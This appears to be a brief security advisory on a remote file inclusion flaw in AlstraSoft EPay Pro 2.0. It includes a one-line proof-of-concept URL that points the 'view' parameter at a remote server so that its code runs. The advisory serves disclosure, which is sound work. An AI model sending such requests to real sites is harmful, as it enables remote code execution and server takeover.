[原文]PHP remote file inclusion vulnerability in index.php in AlstraSoft EPay Pro 2.0 allows remote attackers to execute arbitrary PHP code by modifying the view parameter to reference a URL on a remote web server that contains the code.
Discovery is credited to Diabolic Crab dcrab <email@example.com>.
AlstraSoft EPay Pro 2.0
EPay Pro is reported prone to a remote file include vulnerability.
The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'view' parameter.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer.
EPay Pro version 2.0 is vulnerable to this issue.
An exploit is not required.
Proof of concept example is available: http://www.example.com/epal/index.php?view=http://www.example.com/
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: firstname.lastname@example.org <mailto:email@example.com>.